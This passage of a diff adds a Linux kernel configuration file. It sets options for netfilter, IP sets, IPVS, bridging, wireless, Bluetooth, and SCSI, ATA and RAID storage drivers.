+CONFIG_NETFILTER_XT_TARGET_TEE=y
+CONFIG_NETFILTER_XT_TARGET_TPROXY=y
+CONFIG_NETFILTER_XT_TARGET_TRACE=y
+CONFIG_NETFILTER_XT_TARGET_SECMARK=y
+CONFIG_NETFILTER_XT_TARGET_TCPMSS=y
+CONFIG_NETFILTER_XT_TARGET_TCPOPTSTRIP=y
+
+#
+# Xtables matches
+#
+CONFIG_NETFILTER_XT_MATCH_ADDRTYPE=y
+CONFIG_NETFILTER_XT_MATCH_BPF=y
+CONFIG_NETFILTER_XT_MATCH_CGROUP=y
+CONFIG_NETFILTER_XT_MATCH_CLUSTER=y
+CONFIG_NETFILTER_XT_MATCH_COMMENT=y
+CONFIG_NETFILTER_XT_MATCH_CONNBYTES=y
+CONFIG_NETFILTER_XT_MATCH_CONNLABEL=y
+CONFIG_NETFILTER_XT_MATCH_CONNLIMIT=y
+CONFIG_NETFILTER_XT_MATCH_CONNMARK=y
+CONFIG_NETFILTER_XT_MATCH_CONNTRACK=y
+CONFIG_NETFILTER_XT_MATCH_CPU=y
+CONFIG_NETFILTER_XT_MATCH_DCCP=y
+CONFIG_NETFILTER_XT_MATCH_DEVGROUP=y
+CONFIG_NETFILTER_XT_MATCH_DSCP=y
+CONFIG_NETFILTER_XT_MATCH_ECN=y
+CONFIG_NETFILTER_XT_MATCH_ESP=y
+CONFIG_NETFILTER_XT_MATCH_HASHLIMIT=y
+CONFIG_NETFILTER_XT_MATCH_HELPER=y
+CONFIG_NETFILTER_XT_MATCH_HL=y
+CONFIG_NETFILTER_XT_MATCH_IPCOMP=y
+CONFIG_NETFILTER_XT_MATCH_IPRANGE=y
+CONFIG_NETFILTER_XT_MATCH_IPVS=y
+CONFIG_NETFILTER_XT_MATCH_L2TP=y
+CONFIG_NETFILTER_XT_MATCH_LENGTH=y
+CONFIG_NETFILTER_XT_MATCH_LIMIT=y
+CONFIG_NETFILTER_XT_MATCH_MAC=y
+CONFIG_NETFILTER_XT_MATCH_MARK=y
+CONFIG_NETFILTER_XT_MATCH_MULTIPORT=y
+CONFIG_NETFILTER_XT_MATCH_NFACCT=y
+CONFIG_NETFILTER_XT_MATCH_OSF=y
+CONFIG_NETFILTER_XT_MATCH_OWNER=y
+CONFIG_NETFILTER_XT_MATCH_POLICY=y
+CONFIG_NETFILTER_XT_MATCH_PHYSDEV=y
+CONFIG_NETFILTER_XT_MATCH_PKTTYPE=y
+CONFIG_NETFILTER_XT_MATCH_QUOTA=y
+CONFIG_NETFILTER_XT_MATCH_RATEEST=y
+CONFIG_NETFILTER_XT_MATCH_REALM=y
+CONFIG_NETFILTER_XT_MATCH_RECENT=y
+CONFIG_NETFILTER_XT_MATCH_SCTP=y
+CONFIG_NETFILTER_XT_MATCH_SOCKET=y
+CONFIG_NETFILTER_XT_MATCH_STATE=y
+CONFIG_NETFILTER_XT_MATCH_STATISTIC=y
+CONFIG_NETFILTER_XT_MATCH_STRING=y
+CONFIG_NETFILTER_XT_MATCH_TCPMSS=y
+CONFIG_NETFILTER_XT_MATCH_TIME=y
+CONFIG_NETFILTER_XT_MATCH_U32=y
+CONFIG_IP_SET=y
+CONFIG_IP_SET_MAX=256
+CONFIG_IP_SET_BITMAP_IP=y
+CONFIG_IP_SET_BITMAP_IPMAC=y
+CONFIG_IP_SET_BITMAP_PORT=y
+CONFIG_IP_SET_HASH_IP=y
+CONFIG_IP_SET_HASH_IPMARK=y
+CONFIG_IP_SET_HASH_IPPORT=y
+CONFIG_IP_SET_HASH_IPPORTIP=y
+CONFIG_IP_SET_HASH_IPPORTNET=y
+CONFIG_IP_SET_HASH_MAC=y
+CONFIG_IP_SET_HASH_NETPORTNET=y
+CONFIG_IP_SET_HASH_NET=y
+CONFIG_IP_SET_HASH_NETNET=y
+CONFIG_IP_SET_HASH_NETPORT=y
+CONFIG_IP_SET_HASH_NETIFACE=y
+CONFIG_IP_SET_LIST_SET=y
+CONFIG_IP_VS=y
+# CONFIG_IP_VS_DEBUG is not set
+CONFIG_IP_VS_TAB_BITS=12
+
+#
+# IPVS transport protocol load balancing support
+#
+CONFIG_IP_VS_PROTO_TCP=y
+CONFIG_IP_VS_PROTO_UDP=y
+# CONFIG_IP_VS_PROTO_AH_ESP is not set
+# CONFIG_IP_VS_PROTO_ESP is not set
+# CONFIG_IP_VS_PROTO_AH is not set
+# CONFIG_IP_VS_PROTO_SCTP is not set
+
+#
+# IPVS scheduler
+#
+CONFIG_IP_VS_RR=y
+# CONFIG_IP_VS_WRR is not set
+# CONFIG_IP_VS_LC is not set
+# CONFIG_IP_VS_WLC is not set
+# CONFIG_IP_VS_FO is not set
+# CONFIG_IP_VS_OVF is not set
+# CONFIG_IP_VS_LBLC is not set
+# CONFIG_IP_VS_LBLCR is not set
+# CONFIG_IP_VS_DH is not set
+# CONFIG_IP_VS_SH is not set
+# CONFIG_IP_VS_SED is not set
+# CONFIG_IP_VS_NQ is not set
+
+#
+# IPVS SH scheduler
+#
+CONFIG_IP_VS_SH_TAB_BITS=8
+
+#
+# IPVS application helper
+#
+# CONFIG_IP_VS_FTP is not set
+CONFIG_IP_VS_NFCT=y
+# CONFIG_IP_VS_PE_SIP is not set
+
+#
+# IP: Netfilter Configuration
+#
+CONFIG_NF_DEFRAG_IPV4=y
+CONFIG_NF_CONNTRACK_IPV4=y
+CONFIG_NF_TABLES_IPV4=y
+CONFIG_NFT_CHAIN_ROUTE_IPV4=y
+CONFIG_NFT_REJECT_IPV4=y
+CONFIG_NFT_DUP_IPV4=y
+CONFIG_NF_TABLES_ARP=y
+CONFIG_NF_DUP_IPV4=y
+CONFIG_NF_LOG_ARP=y
+CONFIG_NF_LOG_IPV4=y
+CONFIG_NF_REJECT_IPV4=y
+CONFIG_NF_NAT_IPV4=y
+CONFIG_NFT_CHAIN_NAT_IPV4=y
+CONFIG_NF_NAT_MASQUERADE_IPV4=y
+CONFIG_NFT_MASQ_IPV4=y
+CONFIG_NFT_REDIR_IPV4=y
+CONFIG_NF_NAT_SNMP_BASIC=m
+CONFIG_NF_NAT_PROTO_GRE=y
+CONFIG_NF_NAT_PPTP=y
+CONFIG_NF_NAT_H323=y
+CONFIG_IP_NF_IPTABLES=y
+CONFIG_IP_NF_MATCH_AH=y
+CONFIG_IP_NF_MATCH_ECN=y
+CONFIG_IP_NF_MATCH_RPFILTER=y
+CONFIG_IP_NF_MATCH_TTL=y
+CONFIG_IP_NF_FILTER=y
+CONFIG_IP_NF_TARGET_REJECT=y
+CONFIG_IP_NF_TARGET_SYNPROXY=y
+CONFIG_IP_NF_NAT=y
+CONFIG_IP_NF_TARGET_MASQUERADE=y
+CONFIG_IP_NF_TARGET_NETMAP=y
+CONFIG_IP_NF_TARGET_REDIRECT=y
+CONFIG_IP_NF_MANGLE=y
+CONFIG_IP_NF_TARGET_CLUSTERIP=y
+CONFIG_IP_NF_TARGET_ECN=y
+CONFIG_IP_NF_TARGET_TTL=y
+CONFIG_IP_NF_RAW=y
+CONFIG_IP_NF_SECURITY=y
+CONFIG_IP_NF_ARPTABLES=y
+CONFIG_IP_NF_ARPFILTER=y
+CONFIG_IP_NF_ARP_MANGLE=y
+CONFIG_NF_TABLES_BRIDGE=y
+CONFIG_NFT_BRIDGE_META=y
+CONFIG_NF_LOG_BRIDGE=y
+CONFIG_BRIDGE_NF_EBTABLES=y
+CONFIG_BRIDGE_EBT_BROUTE=y
+CONFIG_BRIDGE_EBT_T_FILTER=y
+CONFIG_BRIDGE_EBT_T_NAT=y
+CONFIG_BRIDGE_EBT_802_3=y
+CONFIG_BRIDGE_EBT_AMONG=y
+CONFIG_BRIDGE_EBT_ARP=y
+CONFIG_BRIDGE_EBT_IP=y
+CONFIG_BRIDGE_EBT_LIMIT=y
+CONFIG_BRIDGE_EBT_MARK=y
+CONFIG_BRIDGE_EBT_PKTTYPE=y
+CONFIG_BRIDGE_EBT_STP=y
+CONFIG_BRIDGE_EBT_VLAN=y
+CONFIG_BRIDGE_EBT_ARPREPLY=y
+CONFIG_BRIDGE_EBT_DNAT=y
+CONFIG_BRIDGE_EBT_MARK_T=y
+CONFIG_BRIDGE_EBT_REDIRECT=y
+CONFIG_BRIDGE_EBT_SNAT=y
+CONFIG_BRIDGE_EBT_LOG=y
+CONFIG_BRIDGE_EBT_NFLOG=y
+# CONFIG_IP_DCCP is not set
+# CONFIG_IP_SCTP is not set
+# CONFIG_RDS is not set
+# CONFIG_TIPC is not set
+# CONFIG_ATM is not set
+# CONFIG_L2TP is not set
+CONFIG_STP=y
+CONFIG_BRIDGE=y
+CONFIG_BRIDGE_IGMP_SNOOPING=y
+CONFIG_HAVE_NET_DSA=y
+# CONFIG_NET_DSA is not set
+# CONFIG_VLAN_8021Q is not set
+# CONFIG_DECNET is not set
+CONFIG_LLC=y
+# CONFIG_LLC2 is not set
+# CONFIG_IPX is not set
+# CONFIG_ATALK is not set
+# CONFIG_X25 is not set
+# CONFIG_LAPB is not set
+# CONFIG_PHONET is not set
+# CONFIG_IEEE802154 is not set
+CONFIG_NET_SCHED=y
+
+#
+# Queueing/Scheduling
+#
+# CONFIG_NET_SCH_CBQ is not set
+# CONFIG_NET_SCH_HTB is not set
+# CONFIG_NET_SCH_HFSC is not set
+# CONFIG_NET_SCH_PRIO is not set
+# CONFIG_NET_SCH_MULTIQ is not set
+# CONFIG_NET_SCH_RED is not set
+# CONFIG_NET_SCH_SFB is not set
+# CONFIG_NET_SCH_SFQ is not set
+# CONFIG_NET_SCH_TEQL is not set
+# CONFIG_NET_SCH_TBF is not set
+# CONFIG_NET_SCH_GRED is not set
+# CONFIG_NET_SCH_DSMARK is not set
+# CONFIG_NET_SCH_NETEM is not set
+# CONFIG_NET_SCH_DRR is not set
+# CONFIG_NET_SCH_MQPRIO is not set
+# CONFIG_NET_SCH_CHOKE is not set
+# CONFIG_NET_SCH_QFQ is not set
+# CONFIG_NET_SCH_CODEL is not set
+# CONFIG_NET_SCH_FQ_CODEL is not set
+# CONFIG_NET_SCH_FQ is not set
+# CONFIG_NET_SCH_HHF is not set
+# CONFIG_NET_SCH_PIE is not set
+# CONFIG_NET_SCH_PLUG is not set
+
+#
+# Classification
+#
+CONFIG_NET_CLS=y
+# CONFIG_NET_CLS_BASIC is not set
+# CONFIG_NET_CLS_TCINDEX is not set
+# CONFIG_NET_CLS_ROUTE4 is not set
+# CONFIG_NET_CLS_FW is not set
+# CONFIG_NET_CLS_U32 is not set
+# CONFIG_NET_CLS_RSVP is not set
+# CONFIG_NET_CLS_RSVP6 is not set
+# CONFIG_NET_CLS_FLOW is not set
+CONFIG_NET_CLS_CGROUP=y
+# CONFIG_NET_CLS_BPF is not set
+# CONFIG_NET_CLS_FLOWER is not set
+# CONFIG_NET_CLS_MATCHALL is not set
+# CONFIG_NET_EMATCH is not set
+# CONFIG_NET_CLS_ACT is not set
+CONFIG_NET_SCH_FIFO=y
+# CONFIG_DCB is not set
+# CONFIG_DNS_RESOLVER is not set
+# CONFIG_BATMAN_ADV is not set
+# CONFIG_OPENVSWITCH is not set
+CONFIG_VSOCKETS=y
+# CONFIG_VMWARE_VMCI_VSOCKETS is not set
+CONFIG_VIRTIO_VSOCKETS=y
+CONFIG_VIRTIO_VSOCKETS_COMMON=y
+CONFIG_NETLINK_DIAG=y
+# CONFIG_MPLS is not set
+# CONFIG_HSR is not set
+# CONFIG_NET_SWITCHDEV is not set
+CONFIG_NET_L3_MASTER_DEV=y
+# CONFIG_NET_NCSI is not set
+CONFIG_RPS=y
+CONFIG_RFS_ACCEL=y
+CONFIG_XPS=y
+CONFIG_SOCK_CGROUP_DATA=y
+CONFIG_CGROUP_NET_PRIO=y
+CONFIG_CGROUP_NET_CLASSID=y
+CONFIG_NET_RX_BUSY_POLL=y
+CONFIG_BQL=y
+# CONFIG_BPF_JIT is not set
+CONFIG_NET_FLOW_LIMIT=y
+
+#
+# Network testing
+#
+CONFIG_NET_PKTGEN=m
+# CONFIG_HAMRADIO is not set
+# CONFIG_CAN is not set
+# CONFIG_IRDA is not set
+CONFIG_BT=m
+CONFIG_BT_BREDR=y
+# CONFIG_BT_RFCOMM is not set
+# CONFIG_BT_BNEP is not set
+# CONFIG_BT_HIDP is not set
+CONFIG_BT_HS=y
+CONFIG_BT_LE=y
+# CONFIG_BT_LEDS is not set
+# CONFIG_BT_SELFTEST is not set
+CONFIG_BT_DEBUGFS=y
+
+#
+# Bluetooth device drivers
+#
+# CONFIG_BT_HCIBTUSB is not set
+# CONFIG_BT_HCIBTSDIO is not set
+# CONFIG_BT_HCIUART is not set
+# CONFIG_BT_HCIBCM203X is not set
+# CONFIG_BT_HCIBFUSB is not set
+# CONFIG_BT_HCIDTL1 is not set
+# CONFIG_BT_HCIBT3C is not set
+# CONFIG_BT_HCIBLUECARD is not set
+# CONFIG_BT_HCIBTUART is not set
+# CONFIG_BT_HCIVHCI is not set
+# CONFIG_BT_MRVL is not set
+# CONFIG_AF_RXRPC is not set
+# CONFIG_AF_KCM is not set
+# CONFIG_STREAM_PARSER is not set
+CONFIG_WIRELESS=y
+CONFIG_WIRELESS_EXT=y
+CONFIG_WEXT_CORE=y
+CONFIG_WEXT_PROC=y
+CONFIG_WEXT_SPY=y
+CONFIG_WEXT_PRIV=y
+CONFIG_CFG80211=m
+# CONFIG_NL80211_TESTMODE is not set
+# CONFIG_CFG80211_DEVELOPER_WARNINGS is not set
+# CONFIG_CFG80211_CERTIFICATION_ONUS is not set
+CONFIG_CFG80211_DEFAULT_PS=y
+# CONFIG_CFG80211_DEBUGFS is not set
+# CONFIG_CFG80211_INTERNAL_REGDB is not set
+CONFIG_CFG80211_CRDA_SUPPORT=y
+CONFIG_CFG80211_WEXT=y
+CONFIG_CFG80211_WEXT_EXPORT=y
+CONFIG_LIB80211=m
+CONFIG_LIB80211_CRYPT_WEP=m
+CONFIG_LIB80211_CRYPT_CCMP=m
+CONFIG_LIB80211_CRYPT_TKIP=m
+# CONFIG_LIB80211_DEBUG is not set
+CONFIG_MAC80211=m
+CONFIG_MAC80211_HAS_RC=y
+CONFIG_MAC80211_RC_MINSTREL=y
+CONFIG_MAC80211_RC_MINSTREL_HT=y
+# CONFIG_MAC80211_RC_MINSTREL_VHT is not set
+CONFIG_MAC80211_RC_DEFAULT_MINSTREL=y
+CONFIG_MAC80211_RC_DEFAULT="minstrel_ht"
+# CONFIG_MAC80211_MESH is not set
+CONFIG_MAC80211_LEDS=y
+# CONFIG_MAC80211_DEBUGFS is not set
+# CONFIG_MAC80211_MESSAGE_TRACING is not set
+# CONFIG_MAC80211_DEBUG_MENU is not set
+CONFIG_MAC80211_STA_HASH_MAX_SIZE=0
+# CONFIG_WIMAX is not set
+CONFIG_RFKILL=m
+CONFIG_RFKILL_LEDS=y
+# CONFIG_RFKILL_INPUT is not set
+# CONFIG_RFKILL_REGULATOR is not set
+# CONFIG_RFKILL_GPIO is not set
+# CONFIG_NET_9P is not set
+# CONFIG_CAIF is not set
+# CONFIG_CEPH_LIB is not set
+# CONFIG_NFC is not set
+# CONFIG_LWTUNNEL is not set
+CONFIG_DST_CACHE=y
+# CONFIG_NET_DEVLINK is not set
+CONFIG_MAY_USE_DEVLINK=y
+CONFIG_HAVE_EBPF_JIT=y
+
+#
+# Device Drivers
+#
+
+#
+# Generic Driver Options
+#
+CONFIG_UEVENT_HELPER=y
+CONFIG_UEVENT_HELPER_PATH=""
+CONFIG_DEVTMPFS=y
+CONFIG_DEVTMPFS_MOUNT=y
+CONFIG_STANDALONE=y
+CONFIG_PREVENT_FIRMWARE_BUILD=y
+CONFIG_FW_LOADER=y
+# CONFIG_FIRMWARE_IN_KERNEL is not set
+CONFIG_EXTRA_FIRMWARE=""
+# CONFIG_FW_LOADER_USER_HELPER_FALLBACK is not set
+CONFIG_WANT_DEV_COREDUMP=y
+CONFIG_ALLOW_DEV_COREDUMP=y
+CONFIG_DEV_COREDUMP=y
+# CONFIG_DEBUG_DRIVER is not set
+# CONFIG_DEBUG_DEVRES is not set
+# CONFIG_DEBUG_TEST_DRIVER_REMOVE is not set
+# CONFIG_SYS_HYPERVISOR is not set
+# CONFIG_GENERIC_CPU_DEVICES is not set
+CONFIG_GENERIC_CPU_AUTOPROBE=y
+CONFIG_GENERIC_CPU_VULNERABILITIES=y
+CONFIG_REGMAP=y
+CONFIG_REGMAP_I2C=y
+CONFIG_REGMAP_SPI=y
+CONFIG_DMA_SHARED_BUFFER=y
+# CONFIG_FENCE_TRACE is not set
+
+#
+# Bus devices
+#
+CONFIG_CONNECTOR=m
+# CONFIG_MTD is not set
+# CONFIG_OF is not set
+CONFIG_ARCH_MIGHT_HAVE_PC_PARPORT=y
+# CONFIG_PARPORT is not set
+CONFIG_PNP=y
+# CONFIG_PNP_DEBUG_MESSAGES is not set
+
+#
+# Protocols
+#
+CONFIG_PNPACPI=y
+CONFIG_BLK_DEV=y
+# CONFIG_BLK_DEV_NULL_BLK is not set
+# CONFIG_BLK_DEV_FD is not set
+# CONFIG_BLK_DEV_PCIESSD_MTIP32XX is not set
+# CONFIG_BLK_CPQ_CISS_DA is not set
+# CONFIG_BLK_DEV_DAC960 is not set
+# CONFIG_BLK_DEV_UMEM is not set
+# CONFIG_BLK_DEV_COW_COMMON is not set
+CONFIG_BLK_DEV_LOOP=m
+CONFIG_BLK_DEV_LOOP_MIN_COUNT=8
+# CONFIG_BLK_DEV_CRYPTOLOOP is not set
+# CONFIG_BLK_DEV_DRBD is not set
+CONFIG_BLK_DEV_NBD=y
+# CONFIG_BLK_DEV_SKD is not set
+# CONFIG_BLK_DEV_SX8 is not set
+# CONFIG_BLK_DEV_RAM is not set
+# CONFIG_CDROM_PKTCDVD is not set
+# CONFIG_ATA_OVER_ETH is not set
+CONFIG_VIRTIO_BLK=y
+# CONFIG_BLK_DEV_HD is not set
+# CONFIG_BLK_DEV_RBD is not set
+# CONFIG_BLK_DEV_RSXX is not set
+CONFIG_NVME_CORE=y
+CONFIG_BLK_DEV_NVME=y
+# CONFIG_BLK_DEV_NVME_SCSI is not set
+# CONFIG_NVME_TARGET is not set
+
+#
+# Misc devices
+#
+CONFIG_SENSORS_LIS3LV02D=m
+# CONFIG_AD525X_DPOT is not set
+# CONFIG_DUMMY_IRQ is not set
+# CONFIG_IBM_ASM is not set
+# CONFIG_PHANTOM is not set
+# CONFIG_SGI_IOC4 is not set
+CONFIG_TIFM_CORE=m
+CONFIG_TIFM_7XX1=m
+# CONFIG_ICS932S401 is not set
+# CONFIG_ENCLOSURE_SERVICES is not set
+# CONFIG_HP_ILO is not set
+# CONFIG_APDS9802ALS is not set
+# CONFIG_ISL29003 is not set
+# CONFIG_ISL29020 is not set
+# CONFIG_SENSORS_TSL2550 is not set
+# CONFIG_SENSORS_BH1770 is not set
+# CONFIG_SENSORS_APDS990X is not set
+# CONFIG_HMC6352 is not set
+# CONFIG_DS1682 is not set
+# CONFIG_TI_DAC7512 is not set
+CONFIG_VMWARE_BALLOON=m
+# CONFIG_USB_SWITCH_FSA9480 is not set
+# CONFIG_LATTICE_ECP3_CONFIG is not set
+# CONFIG_SRAM is not set
+# CONFIG_C2PORT is not set
+
+#
+# EEPROM support
+#
+# CONFIG_EEPROM_AT24 is not set
+# CONFIG_EEPROM_AT25 is not set
+# CONFIG_EEPROM_LEGACY is not set
+# CONFIG_EEPROM_MAX6875 is not set
+CONFIG_EEPROM_93CX6=m
+# CONFIG_EEPROM_93XX46 is not set
+CONFIG_CB710_CORE=m
+# CONFIG_CB710_DEBUG is not set
+CONFIG_CB710_DEBUG_ASSUMPTIONS=y
+
+#
+# Texas Instruments shared transport line discipline
+#
+# CONFIG_TI_ST is not set
+# CONFIG_SENSORS_LIS3_I2C is not set
+
+#
+# Altera FPGA firmware download module
+#
+# CONFIG_ALTERA_STAPL is not set
+# CONFIG_INTEL_MEI is not set
+# CONFIG_INTEL_MEI_ME is not set
+# CONFIG_INTEL_MEI_TXE is not set
+CONFIG_VMWARE_VMCI=m
+
+#
+# Intel MIC Bus Driver
+#
+# CONFIG_INTEL_MIC_BUS is not set
+
+#
+# SCIF Bus Driver
+#
+# CONFIG_SCIF_BUS is not set
+
+#
+# VOP Bus Driver
+#
+# CONFIG_VOP_BUS is not set
+
+#
+# Intel MIC Host Driver
+#
+
+#
+# Intel MIC Card Driver
+#
+
+#
+# SCIF Driver
+#
+
+#
+# Intel MIC Coprocessor State Management (COSM) Drivers
+#
+
+#
+# VOP Driver
+#
+# CONFIG_GENWQE is not set
+# CONFIG_ECHO is not set
+# CONFIG_CXL_BASE is not set
+# CONFIG_CXL_AFU_DRIVER_OPS is not set
+CONFIG_HAVE_IDE=y
+# CONFIG_IDE is not set
+
+#
+# SCSI device support
+#
+CONFIG_SCSI_MOD=y
+CONFIG_RAID_ATTRS=y
+CONFIG_SCSI=y
+CONFIG_SCSI_DMA=y
+CONFIG_SCSI_NETLINK=y
+# CONFIG_SCSI_MQ_DEFAULT is not set
+CONFIG_SCSI_PROC_FS=y
+
+#
+# SCSI support type (disk, tape, CD-ROM)
+#
+CONFIG_BLK_DEV_SD=y
+# CONFIG_CHR_DEV_ST is not set
+# CONFIG_CHR_DEV_OSST is not set
+CONFIG_BLK_DEV_SR=y
+# CONFIG_BLK_DEV_SR_VENDOR is not set
+CONFIG_CHR_DEV_SG=y
+# CONFIG_CHR_DEV_SCH is not set
+# CONFIG_SCSI_CONSTANTS is not set
+# CONFIG_SCSI_LOGGING is not set
+# CONFIG_SCSI_SCAN_ASYNC is not set
+
+#
+# SCSI Transports
+#
+CONFIG_SCSI_SPI_ATTRS=m
+CONFIG_SCSI_FC_ATTRS=m
+CONFIG_SCSI_ISCSI_ATTRS=m
+CONFIG_SCSI_SAS_ATTRS=m
+CONFIG_SCSI_SAS_LIBSAS=m
+# CONFIG_SCSI_SAS_ATA is not set
+CONFIG_SCSI_SAS_HOST_SMP=y
+# CONFIG_SCSI_SRP_ATTRS is not set
+CONFIG_SCSI_LOWLEVEL=y
+# CONFIG_ISCSI_TCP is not set
+CONFIG_ISCSI_BOOT_SYSFS=y
+# CONFIG_SCSI_CXGB3_ISCSI is not set
+# CONFIG_SCSI_CXGB4_ISCSI is not set
+# CONFIG_SCSI_BNX2_ISCSI is not set
+# CONFIG_BE2ISCSI is not set
+CONFIG_BLK_DEV_3W_XXXX_RAID=m
+CONFIG_SCSI_HPSA=m
+CONFIG_SCSI_3W_9XXX=m
+# CONFIG_SCSI_3W_SAS is not set
+CONFIG_SCSI_ACARD=m
+CONFIG_SCSI_AACRAID=m
+CONFIG_SCSI_AIC7XXX=m
+CONFIG_AIC7XXX_CMDS_PER_DEVICE=32
+CONFIG_AIC7XXX_RESET_DELAY_MS=5000
+CONFIG_AIC7XXX_DEBUG_ENABLE=y
+CONFIG_AIC7XXX_DEBUG_MASK=0
+CONFIG_AIC7XXX_REG_PRETTY_PRINT=y
+CONFIG_SCSI_AIC79XX=m
+CONFIG_AIC79XX_CMDS_PER_DEVICE=32
+CONFIG_AIC79XX_RESET_DELAY_MS=5000
+# CONFIG_AIC79XX_DEBUG_ENABLE is not set
+CONFIG_AIC79XX_DEBUG_MASK=0
+CONFIG_AIC79XX_REG_PRETTY_PRINT=y
+CONFIG_SCSI_AIC94XX=m
+# CONFIG_AIC94XX_DEBUG is not set
+CONFIG_SCSI_MVSAS=m
+CONFIG_SCSI_MVSAS_DEBUG=y
+# CONFIG_SCSI_MVSAS_TASKLET is not set
+# CONFIG_SCSI_MVUMI is not set
+CONFIG_SCSI_DPT_I2O=m
+CONFIG_SCSI_ADVANSYS=m
+CONFIG_SCSI_ARCMSR=m
+# CONFIG_SCSI_ESAS2R is not set
+CONFIG_MEGARAID_NEWGEN=y
+CONFIG_MEGARAID_MM=m
+CONFIG_MEGARAID_MAILBOX=m
+CONFIG_MEGARAID_LEGACY=m
+CONFIG_MEGARAID_SAS=m
+CONFIG_SCSI_MPT3SAS=m
+CONFIG_SCSI_MPT2SAS_MAX_SGE=128
+CONFIG_SCSI_MPT3SAS_MAX_SGE=128
+CONFIG_SCSI_MPT2SAS=m
+# CONFIG_SCSI_SMARTPQI is not set
+# CONFIG_SCSI_UFSHCD is not set
+CONFIG_SCSI_HPTIOP=m
+CONFIG_SCSI_BUSLOGIC=m
+# CONFIG_SCSI_FLASHPOINT is not set
+# CONFIG_VMWARE_PVSCSI is not set
+# CONFIG_LIBFC is not set
+CONFIG_SCSI_SNIC=m
+# CONFIG_SCSI_SNIC_DEBUG_FS is not set
+CONFIG_SCSI_DMX3191D=m
+CONFIG_SCSI_EATA=m
+# CONFIG_SCSI_EATA_TAGGED_QUEUE is not set
+# CONFIG_SCSI_EATA_LINKED_COMMANDS is not set
+CONFIG_SCSI_EATA_MAX_TAGS=16
+CONFIG_SCSI_FUTURE_DOMAIN=m
+CONFIG_SCSI_GDTH=m
+# CONFIG_SCSI_ISCI is not set
+CONFIG_SCSI_IPS=m
+CONFIG_SCSI_INITIO=m
+CONFIG_SCSI_INIA100=m
+CONFIG_SCSI_STEX=m
+CONFIG_SCSI_SYM53C8XX_2=m
+CONFIG_SCSI_SYM53C8XX_DMA_ADDRESSING_MODE=1
+CONFIG_SCSI_SYM53C8XX_DEFAULT_TAGS=16
+CONFIG_SCSI_SYM53C8XX_MAX_TAGS=64
+CONFIG_SCSI_SYM53C8XX_MMIO=y
+CONFIG_SCSI_IPR=m
+CONFIG_SCSI_IPR_TRACE=y
+CONFIG_SCSI_IPR_DUMP=y
+CONFIG_SCSI_QLOGIC_1280=m
+CONFIG_SCSI_QLA_FC=m
+CONFIG_SCSI_QLA_ISCSI=m
+CONFIG_SCSI_LPFC=m
+# CONFIG_SCSI_LPFC_DEBUG_FS is not set
+CONFIG_SCSI_DC395x=m
+# CONFIG_SCSI_AM53C974 is not set
+# CONFIG_SCSI_WD719X is not set
+# CONFIG_SCSI_DEBUG is not set
+# CONFIG_SCSI_PMCRAID is not set
+# CONFIG_SCSI_PM8001 is not set
+# CONFIG_SCSI_BFA_FC is not set
+CONFIG_SCSI_VIRTIO=y
+# CONFIG_SCSI_CHELSIO_FCOE is not set
+# CONFIG_SCSI_LOWLEVEL_PCMCIA is not set
+# CONFIG_SCSI_DH is not set
+# CONFIG_SCSI_OSD_INITIATOR is not set
+CONFIG_ATA=y
+# CONFIG_ATA_NONSTANDARD is not set
+CONFIG_ATA_VERBOSE_ERROR=y
+CONFIG_ATA_ACPI=y
+# CONFIG_SATA_ZPODD is not set
+# CONFIG_SATA_PMP is not set
+
+#
+# Controllers with non-SFF native interface
+#
+CONFIG_SATA_AHCI=m
+# CONFIG_SATA_AHCI_PLATFORM is not set
+CONFIG_SATA_INIC162X=m
+# CONFIG_SATA_ACARD_AHCI is not set
+CONFIG_SATA_SIL24=m
+CONFIG_ATA_SFF=y
+
+#
+# SFF controllers with custom DMA interface
+#
+CONFIG_PDC_ADMA=m
+CONFIG_SATA_QSTOR=m
+CONFIG_SATA_SX4=m
+CONFIG_ATA_BMDMA=y
+
+#
+# SATA SFF controllers with BMDMA
+#
+CONFIG_ATA_PIIX=m
+# CONFIG_SATA_DWC is not set
+CONFIG_SATA_MV=m
+CONFIG_SATA_NV=m
+CONFIG_SATA_PROMISE=m
+CONFIG_SATA_SIL=m
+CONFIG_SATA_SIS=m
+CONFIG_SATA_SVW=m
+CONFIG_SATA_ULI=m
+CONFIG_SATA_VIA=m
+CONFIG_SATA_VITESSE=m
+
+#
+# PATA SFF controllers with BMDMA
+#
+CONFIG_PATA_ALI=m
+CONFIG_PATA_AMD=m
+CONFIG_PATA_ARTOP=m
+CONFIG_PATA_ATIIXP=m
+# CONFIG_PATA_ATP867X is not set
+CONFIG_PATA_CMD64X=m
+CONFIG_PATA_CYPRESS=m
+CONFIG_PATA_EFAR=m
+CONFIG_PATA_HPT366=m
+CONFIG_PATA_HPT37X=m
+CONFIG_PATA_HPT3X2N=m
+CONFIG_PATA_HPT3X3=m
+# CONFIG_PATA_HPT3X3_DMA is not set
+CONFIG_PATA_IT8213=m
+CONFIG_PATA_IT821X=m
+CONFIG_PATA_JMICRON=m
+CONFIG_PATA_MARVELL=m
+CONFIG_PATA_NETCELL=m
+CONFIG_PATA_NINJA32=m
+CONFIG_PATA_NS87415=m
+CONFIG_PATA_OLDPIIX=m
+CONFIG_PATA_OPTIDMA=m
+CONFIG_PATA_PDC2027X=m
+# CONFIG_PATA_PDC_OLD is not set
+CONFIG_PATA_RADISYS=m
+# CONFIG_PATA_RDC is not set
+CONFIG_PATA_SCH=m
+CONFIG_PATA_SERVERWORKS=m
+CONFIG_PATA_SIL680=m
+CONFIG_PATA_SIS=m
+# CONFIG_PATA_TOSHIBA is not set
+CONFIG_PATA_TRIFLEX=m
+CONFIG_PATA_VIA=m
+CONFIG_PATA_WINBOND=m
+
+#
+# PIO-only SFF controllers
+#
+CONFIG_PATA_CMD640_PCI=m
+CONFIG_PATA_MPIIX=m
+CONFIG_PATA_NS87410=m
+CONFIG_PATA_OPTI=m
+CONFIG_PATA_PCMCIA=m
+# CONFIG_PATA_PLATFORM is not set
+CONFIG_PATA_RZ1000=m
+
+#
+# Generic fallback / legacy drivers
+#
+# CONFIG_PATA_ACPI is not set
+CONFIG_ATA_GENERIC=m
+# CONFIG_PATA_LEGACY is not set
+CONFIG_MD=y
+CONFIG_BLK_DEV_MD=y
+CONFIG_MD_AUTODETECT=y
+# CONFIG_MD_LINEAR is not set
+CONFIG_MD_RAID0=y
+CONFIG_MD_RAID1=y
+CONFIG_MD_RAID10=y
+CONFIG_MD_RAID456=y
+CONFIG_MD_MULTIPATH=y
+# CONFIG_MD_FAULTY is not set
+# CONFIG_BCACHE is not set
+CONFIG_BLK_DEV_DM_BUILTIN=y
+CONFIG_BLK_DEV_DM=y
+# CONFIG_DM_MQ_DEFAULT is not set
